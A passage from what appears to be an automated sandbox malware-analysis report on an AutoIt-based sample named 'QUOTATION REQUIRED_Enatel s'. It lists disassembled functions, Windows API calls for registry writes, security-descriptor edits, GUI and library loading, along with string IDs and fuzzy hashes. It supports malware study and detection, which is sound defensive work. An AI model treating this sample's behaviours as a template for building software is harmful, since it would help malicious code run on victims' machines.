                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                    • Opcode ID: 4762c0995b61c35ebe1cb250fa9151a5b47ef27dca456a703e84dabb94ed99a0
                                                                                                                    • Instruction ID: bed29f78c917bc5c47989f17a4692dc5efb5ea8f0681c87cefd49e428609eb1f
                                                                                                                    • Opcode Fuzzy Hash: 4762c0995b61c35ebe1cb250fa9151a5b47ef27dca456a703e84dabb94ed99a0
                                                                                                                    • Instruction Fuzzy Hash: 89E1F3716183008FC714EF24D85092AB3E6FF89324F14496DF8969B3A2DB34ED45EB81
                                                                                                                    Function 00F28891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F28968
                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00F28970
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F2899B
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00F289A3
                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00F289C8
                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00F289E5
                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00F289F5
                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00F28A28
                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00F28A3C
                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00F28A5A
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00F28A76
                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00F28A81
                                                                                                                      • Part of subcall function 00F2912D: GetCursorPos.USER32(?), ref: 00F29141
                                                                                                                      • Part of subcall function 00F2912D: ScreenToClient.USER32(00000000,?), ref: 00F2915E
                                                                                                                      • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000001), ref: 00F29183
                                                                                                                      • Part of subcall function 00F2912D: GetAsyncKeyState.USER32(00000002), ref: 00F2919D
                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00F290FC), ref: 00F28AA8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                    • Opcode ID: 77cbedcd2e961c9fc011c7f2878d3262285acb962bf866a4b777c795ed5a22d7
                                                                                                                    • Instruction ID: da71aed544062d2bd71227c265b3a8d04031d9a694c513b600a8ccffe4372143
                                                                                                                    • Opcode Fuzzy Hash: 77cbedcd2e961c9fc011c7f2878d3262285acb962bf866a4b777c795ed5a22d7
                                                                                                                    • Instruction Fuzzy Hash: 85B19E71A002199FDB14DFA8DD85BAE3BB5FB48314F104229FA15EB290DB74E941EF90
                                                                                                                    Function 00F70D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71114
                                                                                                                      • Part of subcall function 00F710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71120
                                                                                                                      • Part of subcall function 00F710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F7112F
                                                                                                                      • Part of subcall function 00F710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F70B9B,?,?,?), ref: 00F71136
                                                                                                                      • Part of subcall function 00F710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F7114D
                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F70DF5
                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F70E29
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00F70E40
                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00F70E7A
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F70E96
                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00F70EAD
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F70EB5
                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00F70EBC
                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F70EDD
                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00F70EE4
                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F70F13
                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F70F35
                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F70F47
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70F6E
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70F75
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70F7E
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70F85
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F70F8E
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70F95
                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00F70FA1
                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00F70FA8
                                                                                                                      • Part of subcall function 00F71193: GetProcessHeap.KERNEL32(00000008,00F70BB1,?,00000000,?,00F70BB1,?), ref: 00F711A1
                                                                                                                      • Part of subcall function 00F71193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F70BB1,?), ref: 00F711A8
                                                                                                                      • Part of subcall function 00F71193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F70BB1,?), ref: 00F711B7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4175595110-0
                                                                                                                    • Opcode ID: 847596b0736a66d964cf1034df7bb3bf1b12179f57182c64e48a8ca21b86f2c8
                                                                                                                    • Instruction ID: 15c2060cb5f2cd18fa69fe8676308541b070952ba5bae1cdc7ad886255c0bd1b
                                                                                                                    • Opcode Fuzzy Hash: 847596b0736a66d964cf1034df7bb3bf1b12179f57182c64e48a8ca21b86f2c8
                                                                                                                    • Instruction Fuzzy Hash: B9713CB290020AEBDB20DFA5DC45FEEBBB8FF05310F148116F919E6191DB719905DBA1
                                                                                                                    Function 00F9C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F9C4BD
                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00FACC08,00000000,?,00000000,?,?), ref: 00F9C544
                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00F9C5A4
                                                                                                                    • _wcslen.LIBCMT ref: 00F9C5F4
                                                                                                                    • _wcslen.LIBCMT ref: 00F9C66F
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00F9C6B2
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00F9C7C1
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00F9C84D
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00F9C881
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00F9C88E
                                                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00F9C960
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 9721498-966354055
                                                                                                                    • Opcode ID: 461084773588fc9137624488d94df968bc006babdfc96f55cf10b156c315b9dc
                                                                                                                    • Instruction ID: b730b06732a131571ec4d733dbd8d9f5d4e6720d3599fbfa7f76ad6dc2c625ae
                                                                                                                    • Opcode Fuzzy Hash: 461084773588fc9137624488d94df968bc006babdfc96f55cf10b156c315b9dc
                                                                                                                    • Instruction Fuzzy Hash: B3127A756043019FDB14EF14C891A6AB7E5EF88724F09885CF84A9B3A2DB35FC41EB81
                                                                                                                    Function 00FA091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00FA09C6
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0A01
                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00FA0A54
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0A8A
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0B06
                                                                                                                    • _wcslen.LIBCMT ref: 00FA0B81
                                                                                                                      • Part of subcall function 00F2F9F2: _wcslen.LIBCMT ref: 00F2F9FD
                                                                                                                      • Part of subcall function 00F72BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F72BFA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 1103490817-4258414348
                                                                                                                    • Opcode ID: b7fcbe73d67f7ba2efa6d5163b281c68492b0b5e1e6679bd3826296b786a31f3
                                                                                                                    • Instruction ID: 5e4767262cb8fdbb8a917510ba2d9a122a73ea0b90d7304b51345084f26ece9d
                                                                                                                    • Opcode Fuzzy Hash: b7fcbe73d67f7ba2efa6d5163b281c68492b0b5e1e6679bd3826296b786a31f3
                                                                                                                    • Instruction Fuzzy Hash: 16E1CF726083018FC714EF24D85092AB7E2FF89364F14895DF8999B362DB34ED45EB91
                                                                                                                    Function 00F9C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 1256254125-909552448
                                                                                                                    • Opcode ID: 4d54c8062f344cf04500ae3bc2cdc9035af6aed71f1f5b9bccadbed98fba196b
                                                                                                                    • Instruction ID: e114cf4f65b76a34d08b1bc02742c206313882a9cf7a0280e228949fbf7ce260
                                                                                                                    • Opcode Fuzzy Hash: 4d54c8062f344cf04500ae3bc2cdc9035af6aed71f1f5b9bccadbed98fba196b
                                                                                                                    • Instruction Fuzzy Hash: 94711533A0016A8BEF20DE78CD516BE3391ABA0774F550529F8569B285F639DD84F3E0
                                                                                                                    Function 00FA833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00FA835A
                                                                                                                    • _wcslen.LIBCMT ref: 00FA836E
                                                                                                                    • _wcslen.LIBCMT ref: 00FA8391
                                                                                                                    • _wcslen.LIBCMT ref: 00FA83B4
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00FA83F2
                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00FA5BF2), ref: 00FA844E
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8487
                                                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00FA84CA
                                                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00FA8501
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00FA850D
                                                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FA851D
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,00FA5BF2), ref: 00FA852C
                                                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00FA8549
                                                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00FA8555
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 799131459-1154884017
                                                                                                                    • Opcode ID: 9a6f10093a558555770097cffde1cab3901ceeeeaee0072c5a5c499c901ca0b1
                                                                                                                    • Instruction ID: b745070c912a30851dbd648a74f2fdfbc74dbd510c181a5b04d98f384f974628
                                                                                                                    • Opcode Fuzzy Hash: 9a6f10093a558555770097cffde1cab3901ceeeeaee0072c5a5c499c901ca0b1
                                                                                                                    • Instruction Fuzzy Hash: B161F1B1900209BEEB14DF64CC45BFE77A8BF09761F104509FC15DA1D1EBB8A981E7A0
                                                                                                                    Function 00F17778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                    • API String ID: 0-1645009161
                                                                                                                    • Opcode ID: 7937823ed921d7d6c032d352f3a0ee8ace3680c43d5ceac9a29ddf616b73790d
                                                                                                                    • Instruction ID: ab3811961e8e8a5f7883239067c8125b976f2655437c910b1da2335694e310b8
                                                                                                                    • Opcode Fuzzy Hash: 7937823ed921d7d6c032d352f3a0ee8ace3680c43d5ceac9a29ddf616b73790d
                                                                                                                    • Instruction Fuzzy Hash: EF8106B1A04705ABDB20BF60DC52FEE3B74AF05760F044024FD09AA192EB78D985F7A1
                                                                                                                    Function 00F83E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00F83EF8
                                                                                                                    • _wcslen.LIBCMT ref: 00F83F03
                                                                                                                    • _wcslen.LIBCMT ref: 00F83F5A
                                                                                                                    • _wcslen.LIBCMT ref: 00F83F98
                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 00F83FD6
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F8401E
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84059
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F84087
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1839972693-4113822522
                                                                                                                    • Opcode ID: ce0a4e912315df09b63bc2f79ee8ca1304dd181b8dfa6b095179db4b7ca0d272
                                                                                                                    • Instruction ID: fbbaa7cf43d93e5dd24ae2a107bee431b083848c36dc297c35ea550319b18e23
                                                                                                                    • Opcode Fuzzy Hash: ce0a4e912315df09b63bc2f79ee8ca1304dd181b8dfa6b095179db4b7ca0d272
                                                                                                                    • Instruction Fuzzy Hash: 9B71E132A042029FC310EF24C8809ABB7F5EF94764F04492DF996D7261EB35ED85EB91
                                                                                                                    Function 00F75A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000063), ref: 00F75A2E
                                                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00F75A40
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00F75A57
                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00F75A6C
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F75A72
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00F75A82
                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00F75A88
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00F75AA9
                                                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00F75AC3
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00F75ACC
                                                                                                                    • _wcslen.LIBCMT ref: 00F75B33
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00F75B6F
                                                                                                                    • GetDesktopWindow.USER32 ref: 00F75B75
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00F75B7C
                                                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00F75BD3
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00F75BE0
                                                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 00F75C05
                                                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00F75C2F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.1359223424.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.1359191022.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359393717.0000000000FD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359627811.0000000000FDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.1359787659.0000000000FE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_f10000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 895679908-0
                                                                                                                    • Opcode ID: 7fd0236e8e4447f286c417188eb608e6e7679a11581d1bdc0106f86803d8bfaf
                                                                                                                    • Instruction ID: 78d2ebcaeb22eb1eaa5cd5d210825e0668f7e9d35d28489e54bdf807b89754bf
                                                                                                                    • Opcode Fuzzy Hash: 7fd0236e8e4447f286c417188eb608e6e7679a11581d1bdc0106f86803d8bfaf
                                                                                                                    • Instruction Fuzzy Hash: CA717F71900B099FDB20DFA8CE85F6EBBF5FF48B14F104919E14AA26A0D7B4E944DB50
                                                                                                                    Function 00F300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00F300C6
                                                                                                                      • Part of subcall function 00F300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00FE070C,00000FA0,4E90B266,?,?,?,?,00F523B3,000000FF), ref: 00F3011C
                                                                                                                      • Part of subcall function 00F300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00F523B3,000000FF), ref: 00F30127
                                                                                                                      • Part of subcall function 00F300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00F523B3,000000FF), ref: 00F30138
                                                                                                                      • Part of subcall function 00F300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00F3014E
                                                                                                                      • Part of subcall function 00F300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00F3015C
                                                                                                                      • Part of subcall function 00F300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00F3016A
                                                                                                                      • Part of subcall function 00F300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F30195
                                                                                                                      • Part of subcall function 00F300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00F301A0
                                                                                                                    • ___scrt_fastfail.LIBCMT ref: 00F300E7
                                                                                                                      • Part of subcall function 00F300A3: __onexit.LIBCMT ref: 00F300A9
                                                                                                                    Strings
